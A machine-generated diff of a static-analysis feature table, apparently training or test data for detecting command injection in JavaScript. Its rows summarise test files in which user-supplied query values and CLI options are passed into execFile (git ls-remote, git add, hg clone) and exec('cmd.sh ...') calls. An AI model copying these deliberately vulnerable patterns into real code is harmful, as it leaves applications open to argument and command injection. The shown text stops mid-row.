autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:30:146:38 | pizzaType | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:30:146:38 | pizzaType | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:30:146:38 | pizzaType | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:30:146:38 | pizzaType | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:30:146:38 | pizzaType | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:1:1:0 | this | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:1:1:0 | this | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:1:1:1 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:1:1:1 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:1:1:1 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:1:1:1 | indirect | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:1:1:1 | indirect | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:1:1:1 | indirect | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:1:1:1 | require | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:1:1:1 | require | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:7:1:13 | express | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:7:1:13 | express | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:7:1:13 | express | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:7:1:34 | express | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:7:1:34 | express | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:7:1:34 | express | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:7:1:34 | express ... press") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:7:1:34 | express ... press") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:7:1:34 | express ... press") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:17:1:23 | require | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:17:1:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:17:1:23 | require | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:17:1:34 | exceptional return of require("express") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:17:1:34 | exceptional return of require("express") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:17:1:34 | exceptional return of require("express") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:17:1:34 | require("express") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:17:1:34 | require("express") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:17:1:34 | require("express") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:25:1:33 | "express" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:25:1:33 | "express" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:25:1:33 | "express" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:25:1:33 | "express" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:25:1:33 | "express" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:25:1:33 | "express" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:7:2:9 | app | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:7:2:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:7:2:9 | app | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:7:2:21 | app | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:7:2:21 | app | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:7:2:21 | app | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:7:2:21 | app = express() | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:7:2:21 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:7:2:21 | app = express() | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:13:2:19 | express | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:13:2:19 | express | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:13:2:19 | express | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:13:2:21 | exceptional return of express() | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:13:2:21 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:13:2:21 | exceptional return of express() | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:13:2:21 | express() | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:13:2:21 | express() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:13:2:21 | express() | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:7:3:18 | { execFile } | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:7:3:18 | { execFile } | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:7:3:18 | { execFile } | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:7:3:45 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:7:3:45 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:7:3:45 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:7:3:45 | { execF ... ocess") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:7:3:45 | { execF ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:7:3:45 | { execF ... ocess") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:9:3:16 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:22:3:28 | require | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:22:3:28 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:22:3:28 | require | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:22:3:45 | exceptional return of require ... ocess") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:22:3:45 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:22:3:45 | exceptional return of require ... ocess") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:22:3:45 | require ... ocess") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:22:3:45 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:22:3:45 | require ... ocess") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:30:3:44 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:30:3:44 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:30:3:44 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:30:3:44 | "child_process" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:30:3:44 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:30:3:44 | "child_process" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:5:3 | app | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:5:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:5:3 | app | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:5:7 | app.get | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:5:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:5:7 | app.get | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:47:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:47:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:47:2 | app.get ... / OK\\n}) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:47:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:47:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:47:2 | exceptional return of app.get ... / OK\\n}) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:5:5:7 | get | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:5:5:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:5:5:7 | get | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:9:5:11 | "/" | CalleeFlexibleAccessPath | app.get | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:9:5:11 | "/" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:9:5:11 | "/" | calleeImports | express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:9:5:11 | "/" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:9:5:11 | "/" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:9:5:11 | "/" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:9:5:11 | "/" | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:5:13 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:5:13 | execFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:5:13 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:5:13 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:5:13 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:5:13 | indirect | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:5:13 | indirect | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:5:13 | indirect | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:5:13 | indirect | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:5:13 | indirect | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | 'arguments' object of anonymous function | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | (req, r ... // OK\\n} | CalleeFlexibleAccessPath | app.get | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | (req, r ... // OK\\n} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | (req, r ... // OK\\n} | calleeImports | express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | (req, r ... // OK\\n} | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | (req, r ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | (req, r ... // OK\\n} | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | (req, r ... // OK\\n} | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | exceptional return of anonymous function | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | exceptional return of anonymous function | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | exceptional return of anonymous function | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | return of anonymous function | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | return of anonymous function | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:14:47:1 | return of anonymous function | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:15:5:17 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:15:5:17 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:15:5:17 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:15:5:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:15:5:17 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:15:5:17 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:15:5:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:15:5:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:15:5:17 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:15:5:17 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:20:5:22 | res | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:20:5:22 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:20:5:22 | res | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:20:5:22 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:20:5:22 | res | 